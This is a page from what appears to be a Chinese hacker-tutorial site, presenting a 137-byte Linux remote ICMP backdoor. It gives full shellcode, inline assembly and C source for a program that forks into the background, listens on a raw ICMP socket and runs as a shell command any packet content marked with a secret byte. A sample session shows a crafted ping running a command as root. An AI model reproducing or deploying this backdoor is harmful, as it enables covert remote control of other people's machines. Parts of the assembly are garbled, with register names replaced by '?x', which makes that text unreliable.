首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 黑客教程

137字节的Linux远程ICMP后门


http://www.gipsky.com/
[example]



main:/home/gloomy/security/shellcode/linux/icmp# ./icmp

Size of shellcode = 137



main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost

PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)

34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms

main:/home/gloomy/security/shellcode/linux/icmp# cat out

uid=0(root) gid=0(root) groups=0(root)

main:/home/gloomy/security/shellcode/linux/icmp#



*/



#include <stdio.h>

#include <unistd.h>

#include <sys/socket.h>

#include <netinet/in.h>



#define SECRET_CHAR "\x99"



char shell[] =

"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"

"\x43\x41\x51\xb1\x03\x51\x49\x51"

"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"

"\xcd\x80\x31\xdb\x39\xc3\x75\x55"

"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"

"\xff\x54\x54\x53\x50\x55\x52\x89"

"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"

"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"

"\xb0\x25\x01\xc5\xb0" SECRET_CHAR

"\x32\x45\xff\x75\xd5\xb0\x02\xcd"

"\x80\x31\xdb\x39\xc3\x74\x25\xeb"

"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"

"\x06\xcd\x80\x5b\x89\xd9\x88\x43"

"\x07\x80\xc1\x08\x50\x55\x51\x53"

"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"

"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"

"\xff"

"/bin/sh -c";



void asm_code() {

__asm("

xorl ?x,?x

xorl ?x,?x

xorl ?x,?x

movb $0x66,%al

incl ?x

incl ?x

push ?x

movb $0x3,%cl

push ?x

decl ?x

push ?x

movl %esp,?x

int $0x80 /* socket(); */

movl ?x,?x



movb $0x2,%al

int $0x80 /* fork(); */

xorl ?x,?x

cmpl ?x,?x

jne exit



endlessloop:

xorl ?x,?x

xorl ?x,?x

movb $0x10,%al

push ?x

movb $0xff,%al

push %esp

push %esp

push ?x

push ?x

push ?p

push ?x

movl %esp,?x

movb $0x66,%al

movb $0x0c,%bl

int $0x80 /* recvfrom(); */



movl ?p,?x

addl ?x,?x

xorl ?x,?x

movb %al,-2(?x)

movb $0x25,%al

addl ?x,?p

movb $0x99,%al /* SECRET_CHAR */

xorb -1(?p),%al

jnz endlessloop



movb $0x2,%al

int $0x80 /* fork(); */

xorl ?x,?x

cmpl ?x,?x

je stack

jmp endlessloop

execve:

xorl ?x,?x

xorl ?x,?x

movb $0x2,%bl

movb $0x6,%al

int $0x80 /* close(); */



pop ?x

movl ?x,?x

movb %al,0x7(?x)

addb $0x8,%cl

push ?x

push ?p

push ?x

push ?x

movl %esp,?x

cdq

movb $0xb,%al

int $0x80 /* execve(); */

exit:

xorl ?x,?x

incl ?x

int $0x80 /* exit(); */

stack:

call execve

.string \"/bin/sh -c\"



");

}





void c_code() {

int fd;

int nb = 0;

struct sockaddr_in them;

int them_size = sizeof(struct sockaddr);

char buf[256];

char *prog[] = {"/bin/sh","-c",&buf[37],NULL};



fd = socket(2,3,1);

if (fork() > 0) exit(0);

while (1) {

while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));

buf[nb-1] = 0;

if (buf[36] == (char)SECRET_CHAR)

if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }

}

}



int main(int c,char *v[]) {

void (*i)();

i = (void (*)())shell;

fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));

i();

return 0;

}
<< 用ASP木马实现FTP和解压缩 PHPSocketShell[win32] >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号